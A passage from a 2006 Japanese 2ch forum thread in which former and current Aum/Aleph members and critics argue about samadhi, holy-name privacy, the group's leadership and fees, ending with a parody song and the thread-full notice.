私は一度あなたの希望に従い本名を呼ぶのをやめました。しかしあなたは872の書き込みで個人をちらつかせた。
自分で言っていることが矛盾していますが。

してませね^^
俺はホーリーネーム。あなたは本名。
違法なのはどっちだ?


970 :名無しさん@3周年:2006/10/16(月) 10:10:00 ID:wW8jbDwQ
>>966
それはサマディの最終の段階の方でしょう。
第一サマディは認識の停止ではなく「思索」です。
すなわち強い精神集中が不可欠となります。
あなたの所では曲解シタサマディを教えているのでしょうかね。

971 :名無しさん@3周年:2006/10/16(月) 10:14:38 ID:wW8jbDwQ
>>俺はホーリーネーム。あなたは本名。
違法なのはどっちだ?

どちらも個人を特定するのは十分すぎます。ホーリーネームが判れば
それに本名が付属してくることくらいお分かりでしょうに。
こういう掲示板ですからね。
あなた自身の因であることは結局変わりません。
無責任な方だな。
私はこれから私用があるので書き込みはこれで終わりにしますが
あなたにはサマディを始めもっと踏み込んだ話が必要に思いますよ。
それでは。



972 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:16:31 ID:ZRsbW9DA
>>970
>それはサマディの最終の段階の方でしょう。第一サマディは認識の停止ではなく「思索」です。
すなわち強い精神集中が不可欠となります。
あなたの所では曲解シタサマディを教えているのでしょうかね。

あなたは解脱なさってるのでしょう?
ならば最終段階のサマディ。仏教で言う「滅想受定」が真なるサマディのはずですよ^^
俺は最初からそのサマディの話をしてますよ^^
だって解脱してるならそのサマディでしょうに。証明もそれでしなきゃ。
それにそれ以下のサマディは「心のサマディ」で真なるサマディでは無いですよ^^
それが分らないからあなたのはサマディではないと申し上げています。

973 :名無しさん@3周年:2006/10/16(月) 10:19:42 ID:uupZ5NVU
次ぎスレ

果たしてオウム・アーレフの教義は完璧か?86
http://life7.2ch.net/test/read.cgi/psy/1160961043/

974 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:24:24 ID:ZRsbW9DA
>>971
>どちらも個人を特定するのは十分すぎます。

また自分の首を絞めてるw
個人特定を認めましたねw

>ホーリーネームが判ればそれに本名が付属してくることくらいお分かりでしょうに。

それこそあなたが言う自己の因では?

>こういう掲示板ですからね。あなた自身の因であることは結局変わりません。
無責任な方だな。

あなた方が最初に仕掛けてきたことですよ^^
無責任はどちらでしょうね?^^

>私はこれから私用があるので書き込みはこれで終わりにしますがあなたにはサマディを始めもっと踏み込んだ話が必要に思いますよ。
それでは。

いえ。
必要ありません^^
あなたの妄想をこれ以上聞くほどヒマじゃないですw
言いましたよね。俺はその終局段階のサマディに王手をかけてるって。
つまり滅想受定。
あなたの知らない領域に行くのでw


975 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:25:30 ID:ZRsbW9DA
>>973

ありがとう〜^^


976 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:41:00 ID:ZRsbW9DA
ID:wW8jbDwQさん

あなたが何を言おうとそれはあなたの妄想に過ぎないよ。
麻原が自らの解脱を証明するために公開サマディをしなかったのは、出来なかったからだよ。
そう判断されても仕方ない。っていうかそう。
麻原はサマディに入れなかった。
のらりくらり逃げてた。
その男の弟子であるあなたがサマディに入れるわけがない。
だってその男の教えに従ってるのだから。
最終のサマディに入れない以上解脱はありえない。
真なるサマディをあなたは体験していない。

それにサマディに向かえば当然体験が減っていきます。
体験は心の動きだから。それが完全に静まってはじめてサマディは起こります。
ということはオウムの修行法みたいに体験を多くするものはサマディのベクトルでは無いのですよ。
ましてや神通に拘るものはね。

977 :名無しさん@3周年:2006/10/16(月) 12:14:18 ID:+qz2Qcku
>>971
芝とやりとりしてるのはナンダカか?
次期代表に選ばれたので調子に乗ってるんだな。
慢が出てるな。
解脱した気になってやがる。
他人の性にまでいちゃもんつけるナルコ脳症麻原盲信変態症候群患者のクセに。


978 :名無しさん@3周年:2006/10/16(月) 12:21:20 ID:+qz2Qcku
>>933

あべる。
昔芝に自分のとこの掲示板で蹴られたからって仕返か?
程度の低い話は情けないぞ。

979 :中間派の在家信徒:2006/10/16(月) 13:03:33 ID:2/uqiqNQ
 わたし、アーレフの在家信徒の者です。
 シヴァの喜びさんとID:wW8jbDwQさんのやりとり拝見させて
いただきました。
 ID:wW8jbDwQさんは「しかしあなたよりは明らかにサマディを知っています」
と言っているのでサマディ経験者、つまり師の方でしょうか?
 わたしは教団の状態が落ち着くまでと、いったん教団から距離をおいています。
 それで教団関係者のみなさんがどのように考えているのか、情報収集するために
この掲示板に時々来ています。

 サキャ神賢や尊師は「四つの絶対的真理に専心して、心を平安にし止滅しなさい。
そしてすべての魂に慈悲を持ちなさい」とお説きになりました。

 でもサマディをよく知っていると主張するID:wW8jbDwQさんの言葉には
心の平安も慈悲も全く感じられません。

「いかにして相手をねじふせようか?!」という闘争心とかき乱れた感情が
ありありと見て取れます。

 このような人が今教団の指導的立場にいるのでしょうか?そうだとしたら本当に残念です。
 教団のサマディ経験者とあろうともいう人がなぜわざわざこのような掲示板に来て、
脱会者を脅してねじふせようとなさるのでしょうか?

 尊師は「闘争心を捨断しなさい」「一分一秒を惜しんで修行しなさい」
「グルを批判する者に対しても慈悲を持ちなさい」とおっしゃいました。
 ID:wW8jbDwQさんの書き込みはこの尊師の教えに反しています。

 もう教団にはサキャ神賢の教えも尊師の教えもなくなってしまったのでしょうか?
 信徒をやめることを真剣に検討させていただきます。本当に残念です。
 このようになった教団を見て、グルとシヴァ大神も大変残念がっていると
思います。

 

980 :中間派の在家信徒:2006/10/16(月) 13:05:06 ID:2/uqiqNQ

 ID:wW8jbDwQさん、もしわたしのこの書き込みをごらんになったら、
返事を書き込んでいただけないでしょうか?
 わたしの言っていることは間違っているのでしょうか?
 ID:wW8jbDwQさんはわたしの書き込みを見て、どう思われるのでしょうか?
 ID:wW8jbDwQさん、ここには多くの在家信徒が訪れることも忘れないで
ください。

981 :名無しさん@3周年:2006/10/16(月) 13:43:00 ID:yTdIiHUx
 尊師は「闘争心を捨断しなさい」「一分一秒を惜しんで修行しなさい」
「グルを批判する者に対しても慈悲を持ちなさい」

ちがうでしょ。
「闘争心を持ちなさい」「一分一秒を惜しんで性交しなさい:
「グル麻原を批判する者は殺しなさい」でしょ。

982 :名無しさん@3周年:2006/10/16(月) 13:45:33 ID:w5Yv2yab
創価プロ名無し自演、乙

983 :名無しさん@3周年:2006/10/16(月) 13:48:05 ID:w5Yv2yab
>>980
創価プロ固定よ、露骨な自演、乙!



984 :名無しさん@3周年:2006/10/16(月) 13:48:22 ID:yTdIiHUx
批判する者には慈悲を持ちながら殺すってこと?
よくわかんない。

985 :名無しさん@3周年:2006/10/16(月) 13:53:01 ID:w5Yv2yab
創価プロ名無し、自演、乙!



986 :名無しさん@3周年:2006/10/16(月) 14:07:51 ID:JqoKFQs+
次ぎスレ

果たしてオウム・アーレフの教義は完璧か?86
http://life7.2ch.net/test/read.cgi/psy/1160961043/

次ぎスレ

果たしてオウム・アーレフの教義は完璧か?86
http://life7.2ch.net/test/read.cgi/psy/1160961043/

次ぎスレ

果たしてオウム・アーレフの教義は完璧か?86
http://life7.2ch.net/test/read.cgi/psy/1160961043/

987 :名無しさん@3周年:2006/10/16(月) 14:45:08 ID:hSitoVn8
 >尊師は「闘争心を捨断しなさい」

教組は、自分で言ったことを、本当に自分では実践できていたのかね?
立派な説法なんか、宗教書を研究すれば誰にでもできるから、、

草加の池田センセをねらって、サリン?を撒いたでしょう
教組は層化があるせいで、オウムが大きくならないって、思っていたフシが
あるようだけど、、
考えが陰険で幼稚だよ
確かに、草加はでかい
でもそれは、ずっと以前から営業しているからだよ
年季が違う
そこへ、ぽっと出てきたばかりの教祖が、数で勝てないからといって
(私のほうが悟っているのに)と殺そうと企てるというのはね、、

なんでもそうじゃん、選挙だってたった一回出て、落ちただけで
票の操作があったとか、
真剣に政治家になりたいなら、何度かトライするのが当たり前だよ
努力する以前に、他人が邪魔だ悪いっていって
殺したがるけど、それって、冷静な判断かね?
闘争心や害心じゃねえの

せめて、同じ年数やってから、文句言えって思う

988 :名無しさん@3周年:2006/10/16(月) 14:57:06 ID:hSitoVn8
>教組は層化があるせいで、オウムが大きくならないって、思っていたフシが

それに、オウムは設立してから、十分にすごい勢いで、拡大していったと
思うよ
お布施だって、毎月億単位であったでしょう?推測だけど
ま、大きくなればいいってことであれば、十分にすごい勢いで
順調に拡大していたよね、、、
それを、何を欲張ったか、(あっと言う間に日本一)にならないと
いけないかのような、、誇大妄想気味で、超あせっていた

私は、なんでそんなにデカクなりたがっているのか、不思議だった
欲のある奴が、そういうことを努力するんじゃないのかしらね
救済と言う名の隠れ蓑を使って、己の権力欲を満足させたかったんじゃねえの

まあ、警察と追いかけっこしていたから、早く精力拡大して
日本を乗っ取らないと自分が殺される、ってあせりで
拡大していたんだろうけど、迷惑きわまりないよ
警察沙汰にしたのは、自分らの落ち度


989 :白龍:2006/10/16(月) 14:57:50 ID:gNuRWkfw
>>979
私も以前同じような質問をしましたが、
グルを批判する者には、四無量心は適用されず、
容赦がないようです。

初期の頃の、平等心が先に来る、
四無量心が正しかったのかもしれませんね。




990 :名無しさん@3周年:2006/10/16(月) 15:03:46 ID:hSitoVn8
グルに帰依しまーす、って口先で言っていりゃ
セックスしようが、修行以外のいらぬことに金使いまくっても
高い地位でいられるんだろ?

吐き捨ててやりてえよ 

991 :白龍:2006/10/16(月) 15:05:55 ID:gNuRWkfw
>>990
今は3万なにがしのお金を払うと、
教団を、離れていても、
師のタイトルを保持出来るようですよ。

992 :名無しさん@3周年:2006/10/16(月) 15:27:06 ID:rEb0bYMn
サマディに入って尊大になるぞ!

サマディに入って尊大になるぞ!

サマディに入って尊大になるぞ!

993 :名無しさん@3周年:2006/10/16(月) 16:07:51 ID:GdPNJxKx
>>987
昨日はここに書き込みなかったじゃん。
デートでもしてたんかい?

994 :名無しさん@3周年:2006/10/16(月) 16:32:51 ID:hSitoVn8
なんじゃあ、そりゃ
漏れだって10マン入れていた月もあったのに
どんなシステムよ、、

教団離れて一人で暮らして、たとえばオナーニしていようが
渡る世間は鬼ばかりを見ていようが
そんなことわかんないから、3マン払えば師でいられるのかね

995 :名無しさん@3周年:2006/10/16(月) 16:34:12 ID:hSitoVn8
わかんねーよ、先例があるんだから>知子アチャリ

996 :中間派の在家信徒:2006/10/16(月) 16:50:18 ID:2/uqiqNQ
>>989
白龍さん、コメントありがとうございました。
このようなコメントをしてくださったということは白龍さんも在家信徒の方なんですよね?
白龍さんはわたしより先に同じ質問をしていたんですね。
このように考えている在家信徒は多いと思います。

尊師がいらっしゃらなくなってから、11年の歳月が過ぎ、教団は完全に
変貌してしまいました。
絶対だと信じていたグルも教団も無常だったのだと今厳しい現実を突きつけられ
思い知らされています。
この厳しい現実を直視して、これからの自分の修行・人生をどうしていくべきか
考えたいと思います。
もう教団の傲慢で独善的な指導者達の言うことを聞く気にはとうていなれません。
もうしばらく教団の様子を観察させていただきます。

997 :名無しさん@3周年:2006/10/16(月) 16:51:54 ID:GdPNJxKx
3万?たけー!そりゃ、みんなやめてくわ。

998 :さくら:2006/10/16(月) 16:53:46 ID:KmUE0GIE
皆さんお元気そうで何よりです。
今日も楽しく真理を追求しましょ。(*^^*)

999 :名無しさん@3周年:2006/10/16(月) 16:55:12 ID:GdPNJxKx
さくらタン、今日も萌え萌えですね。

1000 :名無しさん@3周年:2006/10/16(月) 17:02:10 ID:hSitoVn8
.「Ωの真理教」(ゲゲゲの鬼太郎)


   Ω Ω 真理教
   朝は寝床で洗脳さ
   楽しいな 楽しいな
   Ωにゃ学校も 戸籍も何にもない
   みんなで洗脳 真理教

   Ω Ω 真理教
   昼は煮え湯で拷問さ
   楽しいな 楽しいな
   Ωにゃ行動の 自由も何にもない
   みんなで拷問 真理教

   Ω Ω 真理教
   夜は墓場で運動会
   楽しいな 楽しいな
   Ωにゃ常識も 治安も何にもない
   みんなで歌おう 真理教

   みんなで歌おう 真理教

*新人類ホムペより

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

445 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)